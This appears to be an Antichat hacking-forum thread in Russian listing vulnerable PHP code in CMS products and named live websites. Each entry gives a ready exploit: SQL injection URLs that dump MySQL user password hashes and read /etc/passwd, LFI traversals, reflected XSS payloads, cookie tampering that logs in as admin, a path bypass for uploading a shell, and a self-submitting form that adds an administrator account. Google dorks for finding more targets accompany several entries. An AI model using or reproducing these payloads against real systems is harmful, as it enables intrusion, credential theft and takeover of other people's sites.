evil-grin.com читалка index.php PHP: import_request_variables("gP", "_"); $n = $_n; $b = $_b; if($n==''){$n = 'index.html';} $node = "/var/www/evil-grin.com/jargon/html/".$n; if($b == 'entry'){$node = "/var/www/evil-grin.com/jargon/html/entry/".$n;} function parse_jargon($file, $b, $n){ $file = eregi_replace('\\\\', '', $file); $file = eregi_replace(' ', '+', $file); $pos = strpos($n, '/'); if($pos){ $pos++; $m = substr($n, 0, $pos); } if(file_exists($file)){ $data = join ('', file ($file)); $data = eregi_replace('<html.*<body*>', '', $data); $data = ereg_replace('src="html/graphics/', $data); $data = ereg_replace("href=\"", "href=\"index.php?b=$b&n=$m", $data); $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "entry/", "href=\"index.php?b=entry&n=", $data); $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "\.\./", "href=\"index.php?n=", $data); $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "http", "href=\"http", $data); $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "mailto", "href=\"mailto", $data); }else{ $data = "$file not found"; } return $data; } http://evil-grin.com/jargon/index.php?n=../index.php SQL bmarks.php PHP: import_request_variables("gP", "_"); $c = $_c; $db = mysql_connect("localhost", "apache", "xyzzy"); mysql_select_db("evil",$db); if($c == ""){ $result = mysql_query("SELECT id, cat, notes from lnk_cat ORDER BY cat",$db); while ($myrow = mysql_fetch_row($result)) { $oput .= "<DT><B><A HREF=\"bmarks.php?c=$myrow[0]\" CLASS=\"led\">$myrow[1]</B></A>\n"; $oput .= "<DD CLASS=\"text\">$myrow[2]\n"; } }else{ $result = mysql_query("SELECT cat from lnk_cat WHERE id = $c",$db); $myrow = mysql_fetch_row($result); $cat = $myrow[0]; $result = mysql_query("SELECT id, uri, txt, notes from links WHERE cat = $c ORDER BY txt",$db); http://www.evil-grin.com/bmarks.php?c=-3+union+select+1,2,version(),load_file(0x2F6574632F706173737764)+from+mysql.user--
Product: SetCMS Author: http://setcms.org Version: 3.6.5 LFI Need: magic_quotes_gpc = off; File: index.php PHP: if (file_exists("modules/$set/index.php")) { if (file_exists("modules/$set/config.php")) { include ("modules/$set/config.php"); } include ("modules/$set/index.php"); Target: ?set=../rss.php%00
termassaojoao.com.br Copyright: Andre Klunk - 2007 | Todos os direiros reservados index.php PHP: if($_GET[conteudo]) { include("$_GET[conteudo]"); } при allow_url_include = Off LFI http://www.termassaojoao.com.br/index.php?conteudo=php://filter/read=convert.base64-encode/resource=index.php
econsult.tv c FreelanceFuture.com 2008 SQL browse2.php PHP: $nodeId = isset($_GET['id'])? $_GET['id'] : 0; ... $strSql = "SELECT * FROM ".CLIPTBL." WHERE browsenode=".$nodeId." ORDER BY ranking".$pageSql; http://www.econsult.tv/browse2.php?id=-21+union+select+1,2,3,load_file(0x2F6574632F706173737764),5,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),7,8+from+mysql.user-- (PS /root очень близко)
jedit.org LFI index.php PHP: $page = $_GET['page']; if ($page == "") $page = "main"; ?> <title> jEdit - Programmer's Text Editor - <?php include($page.".title"); ?> </title> http://www.jedit.org/index.php?page=../../../../../../../../../../etc/passwd%00
PHP: //-------------------------------------------------- // Tiny Blogr 1.0.0rc4 (search) SQL Injection //-------------------------------------------------- //-------------------------------------------------- //Author: Ctacok //Date: 11 December 2009. //Special for Antichat //-------------------------------------------------- // //Need: //magic_quotes = Off. // //-------------------------------------------------- //Script info: //Version: 1.0.0rc4. //Author: Redlinesoft, Trilexcom . //Official site: http://tinyblogr.sourceforge.net/ //-------------------------------------------------- //Vulnerabilty ///search/ //POST: txtKeyword //Usage: exploit.php?url=target.com/path // password = md5($password); // 1%' union select concat_ws(0x3A73716C5F696E6A3A,memUsername,memPassword),null,null,null,null,null,null,null from tbl_epo_member -- ^^ Просто нашёл на компе .txt файл с этим контентом, COPY + PASTE, и всё. Переоформлять не стал, ещё время гробить =\
Product: Stash CMS Version: 1.0.3 Author: http://sourceforge.net/projects/nice-stash/ SQL-inj & Download any files. File: downloadmp3.php PHP: function force_download ($data, $name) { header("Content-Length: " . filesize($data)); header('Content-Type: audio/mp3'); header('Content-Disposition: attachment; filename='.$name); readfile($data); } if(isset($_GET['download'])) { $mp3id = $_GET['download']; $query = "SELECT * FROM ".TBPREFIX."_mp3 WHERE mp3_id = '$mp3id'"; $result = $database->sqlQuery($query); if($result) { foreach($result as $result) { $filename = $result['mp3_filename']; } $filepath = UPLOADSPATH.'/mp3/'.$filename; force_download($filepath, $filename); } } $database->sqlQuery PHP: function sqlQuery($query, $return = TRUE, $complex = TRUE){ $this->result_set = mysql_query($query,$this->conn)or die("Query error: ". mysql_error()); if($return){ $query_results = array(); $i = 0; while($row = mysql_fetch_array($this->result_set, MYSQL_ASSOC)){ foreach($row as $key => $value){ $query_results[$i][$key] = $value; } $i++; } if(count($query_results) == 1 && $complex == FALSE){ $tmp_result = array(); $tmp_result = $query_results['0']; $query_results = array(); $query_results = $tmp_result; } mysql_free_result($this->result_set); return $query_results; } elseif(!$return && !$this->result_set){ mysql_free_result($this->result_set); return FALSE; } elseif(!$return && $this->result_set){ return TRUE; } } Target: 3'+union+select+1,2,3,4,5,version%28%29+--+ Вывод в ошибке filesize(); Если скулю крутить лень,можно все сделать проще. Target: ?download=3'+union+select+1,2,3,4,5,'../../admin/config.php'+--+ Файл который вам предложит скачать браузер - конфиг сервера,качать можно произвольные файлы,хоть etc/passwd,главное подобрать пути.
Маленькая зарисовочка. Product: weEdition Version: 6.0.0.7 Author: http://www.webedition.de/ Code: [B]Lfi:[/B] [COLOR=Red]Need: register_globals = on[/COLOR] File: /we/include/we_html_tools.inc.php Target: ?WE_LANGUAGE=../../{LOCAL_FILE}%00 File: /delInfo.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 File: /moveInfo.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 File: /noAviable.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 File: /noExist.php Target: ?WE_LANGUAGE={LOCAL_FILE}%00 File: /notPublished.php [B] Target: ?WE_LANGUAGE={LOCAL_FILE}%00 Full Path Disclosing:[/B] File: mozillamenu.php Target: Enter you browser: /mozillamenu.php [B]Phpinfo()[/B] File: phpino.php Target: You logining, end enter you browser: phpinfo.php Без кода,если смогу - завтра выложу.
Clean Nuke 1.1 Продукт: Clean Nuke Версия: 1.1 Автор: matteoiamma (phpnuke.org) Скачать: http://sourceforge.net/projects/cleanuke/ Local File Include Условия: Права администратора. Уязвимая часть кода: Сначала переменная $xlanguage заносится в БД в скрипте Code: /admin/modules/settings.php PHP: ... $xlanguage = addslashes(check_words(check_html($xlanguage, "nohtml"))); ... $db->sql_query("UPDATE ".$prefix."_config SET ... language='$xlanguage' ..."); ... Далее, из БД достается значение файла языка, и почти без всяческой фильтрации оно инклудится в файле: Code: /mainfile.php PHP: $result = $db->sql_query("SELECT * FROM ".$prefix."_config"); ... $language = check_html($row['language'], "nohtml"); ... include_once("language/lang-".$language.".php"); PS: Функция check_html проверяет наличие HTML-кода в переменной, и она нам не страшна. Эксплуатация: В панели администратора, в модуле конфигурации (admin.php?op=Configure) изменяем исходный код страницы, вместо Code: <option name='xlanguage' value='english' > вписываем любой файл, например Code: <option name='xlanguage' value='english/../../index' > Кроме этого, если есть права на сервере (н.п. один и тот же хостинг), можно записать файл в папку /tmp, и проинклудить его. SQL - Инъекция Условия: magic_quotes = Off Уязвимая часть кода: Code: /page.php PHP: if (isset($_GET['pid'])){ $content_sql = $db->sql_query("SELECT * FROM ".$prefix."_pages WHERE active = '1' AND pid = '".$_GET['pid']."'"); } Эксплуатация: Code: http://site.ru/cleanuke/page.php?pid=1'+union+select+1,2,3,4,5%23 SQL - Инъекция Условия: Права администратора. magic_quotes = Off Уязвимая часть кода: Code: /admin/modules/authors.php PHP: function modifyadmin($chng_aid) { ... $row = $db->sql_fetchrow($db->sql_query("SELECT aid, name, url, email, pwd, radminsuper, admlanguage from " . $prefix . "_authors where aid='$chng_aid'")); ... Эксплуатация: Code: http://site.ru/cleanuke/admin.php?op=modifyadmin&chng_aid=-1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7%23 SQL - Инъекция Условия: Права администратора. magic_quotes = Off Уязвимая часть кода: Code: /modules/News/admin/index.php PHP: function editStory($sid) { ... $result2 = $db->sql_query("select aid from ".$prefix."_stories where sid='$sid'"); ... Эксплуатация: Code: http://site.ru/cleanuke/admin.php?op=EditStory&sid=-1'+union+select+1,2,3,4,5,6,7,8,9%23 SQL - Инъекция Условия: Права администратора. magic_quotes = Off Уязвимая часть кода: Code: /admin/modules/content.php PHP: if (isset($_POST['pid'])){ $pid=$_POST['pid']; } elseif (isset($_GET['pid_mod'])){ $pid=$_GET['pid_mod']; } $sel_page=$db->sql_query("SELECT * FROM ".$prefix."_pages WHERE pid = '$pid'"); Эксплуатация: Code: http://site.ru/cleanuke/admin.php?op=content&pid_mod=-1'+union+select+1,2,3,4,5%23 SQL - Инъекция Условия: Права администратора. Уязвимая часть кода: Code: /admin/modules/feedbackplus.php Code: Line 119: PHP: function editfeedback($fid) { ... $result = sql_query("SELECT * FROM $prefix"._feedbackplus." WHERE fid=$fid", $dbi); ... Эксплуатация: Code: http://site.ru/cleanuke/admin.php?op=editfeedback&lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12 Дорк Хотя название движка - Clean Nuke, дорк такой: Code: "Powered by WL-Nuke"
Shop-Script FREE Продукт: Shop-Script FREE Оффсайт: http://shop-script.ru Скачать: http://www.shop-script.ru/shop-script-free/ru/shop-script-free.zip Blind SQL-Инъекция Условия: magic_quotes = Off Уязвимая часть кода: Code: /shop/includes/shopping_cart.php PHP: $q = db_query("select in_stock from ".PRODUCTS_TABLE." where productID='".$_GET["add2cart"]."'") or die (db_error() . "<br>select in_stock from ".PRODUCTS_TABLE." where productID='".$_GET["add2cart"]."'"); $is = db_fetch_row($q); $is = $is[0]; //$_SESSION[gids] contains product IDs //$_SESSION[counts] contains product quantities ($_SESSION[counts][$i] corresponds to $_SESSION[gids][$i]) //$_SESSION[gids][$i] == 0 means $i-element is 'empty' if (!isset($_SESSION["gids"])) { $_SESSION["gids"] = array(); $_SESSION["counts"] = array(); } //check for current item in the current shopping cart content $i=0; while ($i<count($_SESSION["gids"]) && $_SESSION["gids"][$i] != $_GET["add2cart"]) $i++; if ($i < count($_SESSION["gids"])) //increase current product's quantity { $_SESSION["counts"][$i]++; } else //no item - add it to $gids array { $_SESSION["gids"][] = $_GET["add2cart"]; $_SESSION["counts"][] = 1; } header("Location: index.php?shopping_cart=yes"); } if (isset($_GET["remove"]) && $_GET["remove"] > 0) //remove from cart product with productID == $remove { $i=0; while ($i<count($_SESSION["gids"]) && $_SESSION["gids"][$i] != $_GET["remove"]) $i++; if ($i<count($_SESSION["gids"])) $_SESSION["gids"][$i] = 0; header("Location: index.php?shopping_cart=yes"); } if (isset($_POST["update"])) //update shopping cart content { foreach ($_POST as $key => $val) if (strstr($key, "count_")) { //select product's in stock level $q = db_query("select in_stock from ".PRODUCTS_TABLE." where productID='".str_replace("count_","",$key)."'") or die (db_error() ); $is = db_fetch_row($q); $is = $is[0]; if ($val > 0) { for ($i=0; $i<count($_SESSION["gids"]); $i++) { if ($_SESSION["gids"][$i] == str_replace("count_","",$key)) { $_SESSION["counts"][$i] = floor($val); } } } else //remove { $i=0; while ($_SESSION["gids"][$i] != str_replace("count_","",$key) && $i<count($_SESSION["gids"])) $i++; $_SESSION["gids"][$i] = 0; } } Эксплуатация: Code: http://site.ru/shop/index.php?shopping_cart=yes&add2cart=72'+and+substring(@@version,1,1)=5%23 SQL-Инъекция Условия: magic_quotes = Off Права администратора Уязвимая часть кода: Code: /products.php PHP: $q = db_query("SELECT categoryID, name, description, customers_rating, Price, picture, in_stock, thumbnail, big_picture, brief_description, list_price, product_code FROM ".PRODUCTS_TABLE." WHERE productID='".$_GET["productID"]."'") or die (db_error()); Эксплуатация: Code: http://site.ru/shop/products.php?productID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23 Blind SQL-Инъекция Условия: magic_quotes = Off Права администратора Уязвимая часть кода: Code: /shop/includes/admin/sub/catalog_products_categories.php PHP: $categoryID = isset($_GET["categoryID"]) ? $_GET["categoryID"] : $_POST["categoryID"]; $q = db_query("SELECT name FROM ".CATEGORIES_TABLE." WHERE categoryID<>0 and categoryID='$categoryID'") or die (db_error()); $row = db_fetch_row($q); Эксплуатация: Code: http://site.ru/shop/admin.php?dpt=catalog&sub=products_categories&categoryID=1'+and+substring(@@version,1,1)=5%23 SQL-Инъекция Условия: magic_quotes = Off Права администратора Уязвимая часть кода: Code: /category.php PHP: $q = db_query("SELECT name, description, picture FROM ".CATEGORIES_TABLE." WHERE categoryID='".$_GET["c_id"]."' and categoryID<>0") or die (db_error()); Эксплуатация: Code: http://localhost/bug/shop/category.php?c_id=-1'+union+select+1,2,3%23&w=23 Дорк: Code: "Powered by Shop-Script FREE"
Просто гугл выдал кучу таких сайтов CubeCart™ Расскрытие путей http://../modules/gateway/ ибо в этой папке есть файл Index.php а в нем PHP: $module = "gateway"; include("../index.php"); ?> а в modules/ нету файла Index.php bgg =) Dopk :
chinmaya.org ViewSource downloadfile.php PHP: <? $filename = $filename; $ext = substr(strrchr($filename, "."), 1); $bytes = filesize("downloadfile/$filename"); header("Content-type: application/$ext"); header("Content-disposition: attachment; filename=\"$filename\""); header("Content-length: $bytes"); @readfile("downloadfile/$filename"); ?> http://www.chinmaya.org/downloadfile.php?filename=../../../../../../../../../../etc/passwd%00 php.ini magic_quotes_gpc = Off register_globals = On SQL news_detail.php PHP: $sqlnews = "select * from newsmaster where newsid='$nid'"; http://www.chinmaya.org/news_detail.php?nid=-123'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x203a20,version(),user(),database()),13,14,15+--+ acharya.php PHP: $sqlach = "select * from acharyamaster where acharyaid='$id'"; http://www.chinmaya.org/acharya.php?id=12'+order+by+100+--+ events_detail.php PHP: $sqlevents = "select * from eventsmaster where eventid='$eid'"; http://www.chinmaya.org/events_detail.php?eid=342'+order+by+100+--+
OwnRS http://sourceforge.net/projects/ownrs/ index.php PHP: $hledany_vyraz = $_GET["hledej"]; ... if($hledany_vyraz!="") $pocet=MySQL_Query("SELECT count(id) FROM ".$db_prefix."clanky WHERE (nepublikovat = 0) AND (datum<now()) AND MATCH(nadpis) AGAINST('$hledany_vyraz') OR MATCH(popis) AGAINST('$hledany_vyraz') OR MATCH(clanek) AGAINST('$hledany_vyraz') ORDER BY (10 * MATCH(nadpis) AGAINST('$hledany_vyraz') + MATCH(popis) AGAINST('$hledany_vyraz') + MATCH(clanek) AGAINST ('$hledany_vyraz'))"); ... if($hledany_vyraz!=""){ $vysledek=mysql_query("SELECT *, DATE_FORMAT(`datum`, '%d.%m.%Y') AS `casformat` from ".$db_prefix."clanky WHERE (nepublikovat = 0) AND (datum<now()) AND (datum<now()) AND MATCH(nadpis) AGAINST('$hledany_vyraz') OR MATCH(popis) AGAINST('$hledany_vyraz') OR MATCH(clanek) AGAINST('$hledany_vyraz') ORDER BY (10 * MATCH(nadpis) AGAINST('$hledany_vyraz') + MATCH(popis) AGAINST('$hledany_vyraz') + MATCH(clanek) AGAINST ('$hledany_vyraz')) LIMIT $strana, $max") or die ("Chyba pшi prбci s databбzн"); $Obsah = '<h1>Vyhledбvбnн vэrazu '.$hledany_vyraz.'</h1> <strong> Pro vэraz '.$hledany_vyraz.' nalezeny tyto zбznamy: </strong><br />'; $TitleWebu = 'Vyhledбvбnн vэrazu '.$hledany_vyraz.' - '.$TitleWebu; } $x=0; //Sosбm data z databбze while ($zaznam=MySQL_Fetch_Array($vysledek)) { $zobrazeni = $zaznam['hint']; $nadpis_bez_diakritiky = seourl($zaznam['nadpis']); //Jakou verzi odkazщ vybrat? if($pekna_url != 0){ $odkaz = $zaznam["id"].'-'.$nadpis_bez_diakritiky.'.html'; }else{ $odkaz = 'clanek.php?id='.$zaznam["id"].'-'.$nadpis_bez_diakritiky; } $id2 = $zaznam['kategorie']; $casformat = $zaznam["casformat"]; $autor = $zaznam['autor']; $jmeno_autora= mysql_query("SELECT nick FROM ".$db_prefix."autori WHERE id = '".$autor."'"); while($zaznam_autor = mysql_fetch_array($jmeno_autora)){ $nazev_autora = $zaznam_autor['nick']; //poинtбnн poиtu komentбшщ a nбslednэ vэpis slova v rщznйm pбdм podle poиtu $dotaz = "SELECT count(id) AS pocet FROM ".$db_prefix."komentare WHERE idclanku ='".$zaznam["id"]."'"; if($v = mysql_query($dotaz)) { $r = mysql_fetch_assoc($v); $komentare=$r["pocet"]; }else{echo "Chyba pшi prбci s databбzн";} if($komentare!=0){ if($komentare<2) $komentare_vypis = '<a href="'.$odkaz.'#komentare">1 komentбш</a>'; else if(($komentare<5)&&($komentare>1)) $komentare_vypis = '<a href="'.$odkaz.'#komentare">'.$komentare.' komentбшe</a>'; else if($komentare>4) $komentare_vypis = '<a href="'.$odkaz.'#komentare">'.$komentare.' komentбшщ</a>'; }else $komentare_vypis = '<a href="'.$odkaz.'#komentare">Rбdnэ komentбш</a>'; //Zji№>ovбnн nбzvu kategorie a pшezdнvky autora $nazev_kategorie = mysql_query("SELECT nazev FROM ".$db_prefix."kategorie WHERE id = '".$id2."'"); while ($udaj = mysql_fetch_array($nazev_kategorie)) $jmeno_kategorie = $udaj['nazev']; уязвим параметр $hledany_vyraz = $_GET["hledej"]; Passive XSS http://localhost/Own_rs/index.php?hledej=1%3Cscript%3Ealert(121212)%3C/script%3E SQL mq=off http://localhost/Own_rs/index.php?hledej=')+union+select+11,12,13,14,15,16,17,18,19,110,111,112;%00+--+ Запрос $vysledek=mysql_query("SELECT *, DATE_FORMAT(`datum`, '%d.%m.%Y') AS `casformat ... записан в несколько строк, поэтому комментарии вида +--+ дают ошибку, ставим более жесткий терминатор ;%00+--+. Сработал $vysledek=mysql_query("SELECT ... но это Blind SQL, попробуем получить вывод. $autor = $zaznam['autor']; $jmeno_autora= mysql_query("SELECT nick FROM ".$db_prefix."autori WHERE id = '".$autor."'"); $zaznam['autor'] берется из запроса $vysledek (поле с числом 17), сформируем иньекцию. http://localhost/Own_rs/index.php?hledej=')+union+select+11,12,13,14,15,16,%2217'+or+1=1+limit+0,1+--+%22,18,19,110,111,112;%00+--+ появился вывод в полях 12, 13, 112 http://localhost/Own_rs/index.php?hledej=')+union+select+11,version(),concat_ws(0x203a20,jmeno,heslo,prava),14,15,16,%2217'+or+1=1+limit+0,1+--+%22,18,19,110,111,database()+from+ownrs_autori;%00+--+
Corporate Merchandise Solution скрипт коммерческий,однако cms фактически не являеться Blind SQL inj пример: WR-Board v 1.5> XSS (с) Twin $park
cms pragmaMx 0.1.11 http://www.pragmamx.org/Downloads-op-view-lid-731.html dork: "This Website based on pragmaMx" Passive XSS уязвимы параметры newlang, name, op, query, show_all,orderby, min, cid, id http://localhost/html/index.php?newlang=1>"><script>alert(121212);</script> http://localhost/html/index.php?newlang=1>"><script>alert(121212)%3B</script> http://localhost/html/modules.php?name=1>"><script>alert(121212)%3B</script> http://localhost/html/modules.php?name=nnn&newlang=1>"><script>alert(121212)%3B</script> http://localhost/html/modules.php?name=nnn&op=NewLinks&query=1>"><script>alert(121221)%3B</script>&min=0&orderby=dateD http://localhost/html/modules.php?name=nnn&show_all=1>"><script>alert(121212)%3B</script> http://localhost/html/modules.php?name=nnn&op=AddEntry&query=111&min=0&orderby=1%22'%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E http://localhost/html/modules.php?name=nnnt&min=1%3E%22%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E&orderby=dateD&cid=0 http://localhost/html/modules.php?name=nnn&rop=showcontent&id=1%3E%22%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E SQL права админа admin/modules/banners.php PHP: function bannerdelete($bid, $ok = 0) { global $prefix, $bgcolor2, $bgcolor3, $script; if (!empty($ok)) { if ($ok == 1) { } sql_query("delete from " . $prefix . "_banner where bid='$bid'"); header("Location: admin.php?op=banneradmin#top"); } else { include("header.php"); GraphicAdmin(); OpenTable(); echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />"; echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>"; CloseTable(); echo '<br />'; $result = sql_query("select bid,imptotal,impmade,clicks,imageurl,clickurl,alttext,script,active,typ from " . $prefix . "_banner where bid=$bid"); list($bid, $imptotal, $impmade, $clicks, $imageurl, $clickurl, $alttext, $script, $active, $typ) = sql_fetch_row($result); http://localhost/html/admin.php?op=bannerdelete&bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10+--+&ok=0 PHP: function banneredit($bid) { global $prefix; include("header.php"); GraphicAdmin(); OpenTable(); echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />"; echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>"; CloseTable(); echo '<br />'; $result = sql_query("select cid, imptotal, impmade, clicks, imageurl, clickurl, alttext, script, typ, active from " . $prefix . "_banner where bid=$bid"); http://localhost/html/admin.php?op=banneredit&bid=-1+union+select+1,2,3,4,version(),6,7,8,9,10+--+&ok=0 PHP: function bannerclientdelete($cid, $ok = 0) { global $prefix, $bid, $cid, $impmade, $clicks, $imageurl, $alttext, $bdate, $typ, $script; if (!empty($ok)) { if ($ok == 1) { sql_query("delete from " . $prefix . "_banner where cid='$cid'"); sql_query("delete from " . $prefix . "_bannerclient where cid='$cid'"); } header("Location: admin.php?op=banneradmin#top"); } else { include("header.php"); GraphicAdmin(); OpenTable(); echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />"; echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>"; CloseTable(); echo '<br />'; OpenTableAl(); $result2 = sql_query("select bid,cid,impmade,clicks,imageurl,clickurl,alttext,datestart,typ,script from " . $prefix . "_banner where cid=$cid"); http://localhost/html/admin.php?op=bannerclientdelete&cid=-1+union+select+1,2,3,4,5,6,7,8,9,version()+--+ PHP: function bannerclientedit($cid) { global $prefix; include("header.php"); GraphicAdmin(); OpenTable(); echo "<div align=\"center\"><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />"; echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></div>"; CloseTable(); echo '<br />'; $result = sql_query("select name, contact, email, login, passwd, extrainfo from " . $prefix . "_bannerclient where cid=$cid"); list($name, $contact, $email, $login, $passwd, $extrainfo) = sql_fetch_row($result); http://localhost/html/admin.php?op=bannerclientedit&cid=-1+union+select+1,version(),3,4,5,6+--+ ================== Обновилась версия CMS до PragmaMX 0.1.12 В ней добавлен новый модуль - osc2pragmaMX, это уже известная osCommerce Online Merchant v2.2 RC2a. Соответсвенно появилаь уязвимость: catalog/admin/includes/application_top.php PHP: ... // redirect to login page if administrator is not yet logged in if (!tep_session_is_registered('admin')) { if (isset($_COOKIE['admin'])){ $bridge_admin = $_COOKIE['admin']; $bridge_admin_login = false; if (!is_array($bridge_admin)) { $bridge_admin = base64_decode($bridge_admin); $bridge_admin = addslashes($bridge_admin); $bridge_admin = explode(":", $bridge_admin); } $bridge_adminid = $bridge_admin[0]; $bridge_adminpwd = $bridge_admin[1]; $bridge_adminid = substr(addslashes($bridge_adminid), 0, 25); if (!empty($bridge_adminid) && !empty($bridge_adminpwd)) { $sql = "SELECT pwd FROM ".$prefix."_authors WHERE aid='$bridge_adminid'"; $result = tep_db_query($sql); $pass = tep_db_fetch_array($result); if ($pass['pwd'] == $bridge_adminpwd && !empty($pass['pwd'])){ tep_session_register('admin'); } } }else{ $redirect = false; $current_page = basename($PHP_SELF); if ($current_page != FILENAME_LOGIN) { if (!tep_session_is_registered('redirect_origin')) { tep_session_register('redirect_origin'); $redirect_origin = array('page' => $current_page, 'get' => $HTTP_GET_VARS); } $redirect = true; } if ($redirect == true) { tep_redirect(tep_href_link(FILENAME_LOGIN)); } unset($redirect); } уязвимость находится в строках PHP: $current_page = basename($PHP_SELF); if ($current_page != FILENAME_LOGIN) { С точки зрения обычного (если он не посещает antichat.ru) программиста это безупречная проверка, но конструкция admin/any_file.php/login.php проходит эту проверку, а на выполнение подается any_file.php. Заливка шелла запускаем файловый менеджер http://demo.osc2pragmamx.org/modules/catalog/admin/file_manager.php/login.php не забываем добавлять к УРЛу login.php новый файл http://demo.osc2pragmamx.org/modules/catalog/admin/file_manager.php/login.php?action=new_file Добавляем себя в админы. AddAdm.html PHP: <form method="post" action="http://demo.osc2pragmamx.org/modules/catalog/admin/administrators.php/login.php?action=insert"> <input type=hidden name="username" value="as" /> <input type=hidden name="password" value="123123" /> <input type=hidden name="x" value="16" /> <input type=hidden name="y" value="13" /> </form> <script>document.getElementsByTagName("form")[0].submit();</script> Уязвимость работает, даже если модуль не подключен, поскольку для запуска используем не CMS, а путь до скрипта http:/site.com/path_cms/modules/catalog/admin/any_file.php
Дабы не копировать по 5 раз. Лучше дам просто ссылку на пост, надеюсь так можно. Там 1 движок News Edit, а второй что-то похожее на движек, просто компания делает сайты все как один, потому это тоже можно назвать движком http://forum.antichat.ru/threadedpost1839460.html#post1839460
cms awcm v2_1 final http://sourceforge.net/projects/awcm/ header.php PHP: if(isset($_GET['id'])) { $gid = $_GET['id']; if(!is_numeric($gid) OR $gid == "") { exit; } } if(isset($_GET['pm'])) { $gpm = $_GET['pm']; if(eregi("'",$gpm) OR eregi("SELECT",$gpm) OR eregi("union",$gpm) OR eregi("delete",$gpm) OR eregi("table",$gpm) OR eregi("member",$gpm) OR eregi("update",$gpm) OR eregi('admin',$gpm) OR $gpm == "") { exit; } } if(isset($_GET['search'])) { $gsearch = $_GET['search']; if(eregi("'",$gsearch)) { exit; } } .... if(isset($_COOKIE['awcm_theme'])) { $theme_file = $_COOKIE['awcm_theme']; } else { $theme_file = $mysql_maininfo_row['defult_theme']; } if(isset($_COOKIE['awcm_lang'])) { $lang_file = $_COOKIE['awcm_lang']; } else { $lang_file = $mysql_maininfo_row['defult_language']; } @include ("themes/$theme_file/settings.php"); include ("common.php"); @include ("languages/$lang_file"); $member_cok = $_COOKIE['awcm_member']-197; if(isset($_SESSION['awcm_member'])) { $member = $_SESSION['awcm_member']; } elseif (isset($_COOKIE['awcm_member'])) { $mysql_checkdookie51_member_query = mysql_query("SELECT password,id FROM awcm_members WHERE id = '$member_cok'"); $mysql_checkdookie51_member_row = mysql_fetch_array($mysql_checkdookie51_member_query); $mysql_checkdookie51_member_total = mysql_num_rows($mysql_checkdookie51_member_query); if ($mysql_checkdookie51_member_total > 0) { $member = $mysql_checkdookie51_member_row['id']; $_SESSION['awcm_member'] = $mysql_checkdookie51_member_row['id']; } } else { $member = 'no'; } LFI mq=off http://localhost/awcm/header.php cookies awcm_theme=../../../../../../../../etc/passwd%00 LFI http://localhost/awcm/header.php cookies awcm_lang=../../../../../../../../etc/passwd Заходим админом http://localhost/awcm/index.php cookies awcm_member=198 ----------------------- include/avatar.php PHP: include ("../connect.php"); $gh = $_GET['h']; $gw = $_GET['w']; $gid = $_GET['id']; $mysql_query = mysql_query("SELECT id,avatar FROM awcm_members WHERE id = '$gid'"); $mysql_total = mysql_num_rows($mysql_query); $mysql_row = mysql_fetch_array($mysql_query); if($mysql_total == 1) { if($mysql_row['avatar'] == "") { print '<img src="../images/no_avatar.jpg" height="'.$gh.'" width="'.$gw.'" />'; } else { print '<img src="'.$mysql_row['avatar'].'" height="'.$gh.'" width="'.$gw.'" />'; } } else { print '<img src="../images/no_avatar.jpg" height="'.$gh.'" width="'.$gw.'" />'; } Passive XSS mq=off http://localhost/awcm/includes/avatar.php?h=1>"><SCRiPt>alert(1212);</SCRiPt> http://localhost/awcm/includes/avatar.php?w=1>"><SCRiPt>alert(1212);</SCRiPt> SQL mq=off http://localhost/awcm/includes/avatar.php?id=1'+and+1=2+union+select+1,version()+--+ ----------------------- includes/show_vid_title.php PHP: include ("../connect.php"); $gid = $_GET['id']; $mysql_show_vid_title_php_query = mysql_query("SELECT id,title FROM awcm_videos_videos WHERE id = '$gid'"); $mysql_show_vid_title_php_row = mysql_fetch_array($mysql_show_vid_title_php_query); print $mysql_show_vid_title_php_row['title']; SQL mq=off http://localhost/awcm/includes/show_vid_title.php?id=-1'+union+select+1,version()+--+ =============== RulleR можно member_cp_pm.php PHP: include ("header.php"); ... if(isset($_GET['pm'])) { $mysql_mmbrcppmviewpmpg_query = mysql_query("SELECT * FROM awcm_member_pms WHERE hash = '$_GET[pm]' AND reciever = '$member' OR hash = '$_GET[pm]' AND sender = '$member'"); SQL mq=off http://localhost/awcm/member_cp_pm.php?pm=%00'+union+select+1,2,3,version(),5,6,7;+--+
